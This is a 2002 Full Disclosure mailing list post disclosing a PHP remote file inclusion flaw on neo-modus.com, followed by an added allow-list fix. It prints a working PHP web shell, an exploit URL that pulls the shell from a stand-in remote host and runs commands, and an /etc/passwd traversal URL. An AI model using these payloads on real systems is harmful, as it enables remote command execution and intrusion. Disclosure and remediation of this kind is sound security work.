Full Disclosure mailing list archives
PHP execution vulnerability on www.neo-modus.com (direct connect homepage)
From: burpz () gmx net (burpz () gmx net)
Date: Wed, 2 Oct 2002 08:01:26 +0200 (MEST)
neo-modus.com is the home of the quite popular file sharing utility 'direct connect'; unfortunately their website is vulnerable to a common php include() vulnerability. The message below was sent 2 weeks ago to the 'bugs' email address listed on their website. I didn't get any response.

--- Forwarded Message ---

Dear Reader,

I recently stumbled across your website www.neo-modus.com. I fiddled around a bit with the .php scripts, and found that they are vulnerable to a very common php error. The index.php script takes a parameter 'page', so it knows what page to show. It then passes the value of this parameter DIRECTLY into an include() statement. This is very, very bad.

Let's say I go to the url: http://www.neo-modus.com/?page=/etc/passwd - this tries to open /etc/passwd.html - so I can break out of the document root and view every file with an .html (or .php?) extension.

This seems not too bad, but there's more. PHP has a feature called "furl_open", which allows include() to take an URL as a parameter to include it in its page. So we create a text file on a different webserver (which doesn't parse .txt files) called test.txt, which contains:

<?php
printf("<div align=\"left\"><pre>");
printf("%s", nl2br(system($HTTP_GET_VARS['cmd'])));
printf("</pre></div>");
?>

We then go to the url http://www.neo-modus.com/?page=http://my.webpage.com/test.txt&cmd=ls -al and we get a nice "ls -al" output run on YOUR webserver. We can run all commands with the privileges of the webserver. I think you can understand how bad this is.

To fix these issues, I suggest you disable furl_open in the php configuration file, and filter the "page" parameter passed to index.php so that it strips slashes, backslashes, dots and limits it to a specific directory only.

Another thing: don't place files which contain password information in the document root. ConnectToDatabase.php contains sensitive information. Change your mysql passwords, and limit access to the mysql server from YOUR website host only. I could connect without problems - this should not be the case.
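The fix the poster asks for, an allow-listed page router in place of passing the 'page' parameter straight into include(), as an added example that is not neo-modus.com's code; it assumes the site's pages live in a ./pages/ directory and the page names in ALLOWED_PAGES are made up for the example:

```php
<?php
// Added example (not the neo-modus.com site's own code). Replaces the pattern
// described in the report, roughly include($_GET['page'] . '.html'), with an
// allow-list lookup plus a path check. The directory and page names are assumed.
declare(strict_types=1);

const PAGE_DIR      = __DIR__ . '/pages';                   // assumed layout
const ALLOWED_PAGES = ['home', 'news', 'download', 'faq'];  // assumed names

function resolve_page(?string $requested): string
{
    // Missing or empty parameter: fall back to the front page.
    if ($requested === null || $requested === '') {
        $requested = 'home';
    }

    // Exact allow-list match. Only these literal names get through, so
    // '../', '/etc/passwd', 'http://...' and NUL bytes are all rejected
    // without any ad-hoc character stripping.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        http_response_code(404);
        $requested = 'home';
    }

    // Defence in depth: confirm the resolved file really sits under PAGE_DIR.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $requested . '.html');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('page resolved outside the page directory');
    }
    return $path;
}

// Remote includes are also switched off server-wide in php.ini
// (the directive the report calls "furl_open" is allow_url_fopen; newer PHP
// additionally has allow_url_include). Credentials such as those in
// ConnectToDatabase.php belong outside the document root, included by path.
//   allow_url_fopen = Off
//   allow_url_include = Off

include resolve_page($_GET['page'] ?? null);
```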